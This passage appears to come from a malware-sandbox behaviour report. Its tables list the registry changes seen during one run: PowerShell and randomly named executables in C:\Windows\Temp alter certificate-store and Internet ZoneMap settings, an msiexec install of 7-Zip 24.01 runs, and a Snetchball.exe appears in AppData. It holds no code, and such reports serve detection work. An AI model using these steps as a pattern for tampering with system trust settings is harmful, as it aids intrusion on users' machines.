| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\MDeMLSm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\UyuqiCb.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\MDeMLSm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\QFkoGpe.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\zPgOjkk.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Directory\shellex\DragDropHandlers\7-Zip | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "9" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Folder\shellex\ContextMenuHandlers\7-Zip | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\ProductName = "7-Zip 24.01" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\96F071321C0410720000000040000000\96F071321C0410724210000010000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\PackageName = "7z2401.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Net\1 = "C:\\Users\\Admin\\Downloads\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{48203D94-A3C6-4F87-B5C0-E949F7884FDF} | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{ECAAD8F8-D40C-4769-A9A3-40DDBAA5BFFA} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\7-Zip | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Directory\shellex\ContextMenuHandlers\7-Zip | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\Complete | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\96F071321C0410720000000040000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{5CD73DD4-F30C-4BCA-8CF1-CD9CF6227D4C} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Downloads\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Drive\shellex\DragDropHandlers\7-Zip | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files (x86)\\7-Zip\\7-zip.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193" | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\Program = "Complete" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\PackageCode = "96F071321C0410724210000020000000" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\LanguageFiles = "Complete" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Version = "402718720" | C:\Windows\system32\msiexec.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 040000000100000010000000866912c070f1ecacacc2d5bca55ba1290f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e720b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000520053004100000009000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b0601050507030862000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b69140000000100000014000000dd040907a2f57a7d5253129295ee3880250da6591d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb190000000100000010000000787d09f953c59978ecd8d6e44b38e24f2000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0